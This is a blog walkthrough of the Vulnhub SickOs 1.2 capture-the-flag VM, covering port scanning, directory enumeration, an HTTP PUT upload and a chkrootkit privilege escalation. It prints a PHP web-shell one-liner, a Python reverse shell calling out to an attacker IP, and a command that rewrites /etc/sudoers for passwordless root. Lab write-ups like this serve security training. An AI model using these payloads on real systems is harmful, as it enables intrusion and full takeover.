Sunday, 9 October 2016

Vulnhub SickOs 1.2

I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)

This VM was tricky towards the end as normal scripts etc didn't work.  I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.

So big thanks to Vulnhub and D4rk36 for this :)


scan

root@kali:~# nmap -Pn -sV -p 0-65535 192.168.1.7

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST
Nmap scan report for 192.168.1.7
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds


ssh


I'll see what ssh yields:


root@kali:~/Downloads# ssh 192.168.1.7
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P'
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'  
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
                                                                                   
By @D4rk36
root@192.168.1.7's password:

Not alot apart from nice ASCII art :D

I'll try port 80 then!

http

Navigating to the ip gives the following page.






















The source code contains no hints, so I'll see if there is anything hidden:

root@kali:~/Downloads# dirb http://192.168.1.7 -w

• -----------------
• DIRB v2.22
• By The Dark Raver
• -----------------

• START_TIME: Sat Oct 8 16:22:08 2016
• URL_BASE: http://192.168.1.7/
• WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
• OPTION: Not Stoping on warning messages

• -----------------

• GENERATED WORDS: 4612

• ---- Scanning URL: http://192.168.1.7/ ----
• + http://192.168.1.7/index.php (CODE:200|SIZE:163)
• ==> DIRECTORY: http://192.168.1.7/test/

• ---- Entering directory: http://192.168.1.7/test/ ----
• (!) WARNING: Directory IS LISTABLE. No need to scan it.
• (Use mode '-w' if you want to scan it anyway)

•                        
                             

Let's see what /test yields:


















Hmmm....

I try and see if there is anything in the way of known weaknesses in lighttpd/1.4.28 but I come away empty handed.

There must be a way to upload to this page....... Hang on!!! What methods are available on this web page can I PUT??















Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell so pentestmonkey's one should do!! (http://pentestmonkey.net/tools/web-shells/php-reverse-shell)

I upload it using nmap's scripting engine:














Check to see if it's there:











Awesome! I set my netcat listener on port 443 then click the file.














Agh!!!

That failed miserably :(

Ok, I wonder if I can get a dirty shell on it?  I use the one liner:

<?php echo shell_exec($_GET['cmd']); ?>














Run the command via the browser:























Sweet!! Now I can try and throw a python listener my way.  I use 443 as it's a web port so less likely to be blocked:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And the result is:













Hurrah!!!

Now to start enumerating:










Ok happy with the release details now to see if I can write anywhere:
I can write to /tmp but when I upload my enumeration script it doesn't allow me to execute it :(

I start to enumerate manually and eventually find some things in the crontab:

















I'll check out the daily one:



















Ok some stuff in here time to start looking at their code.
After sifting through the code nothing jumps out at me so I revert to Google to see if the file "chkrootkit" has any flaws.

Exploit-DB comes up trumps with this  https://www.exploit-db.com/exploits/33899/























Awesome!! Now to create that /tmp/update file and leverage me some privileges!!

Inside the file I put:

chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

This should give my www-data account sudo rights without a password :)

The cronjob runs and:








I am root :) 

Let's see what is lurking within:






Phew!! This made me stretch the old grey matter!!!!

No comments:

Post a Comment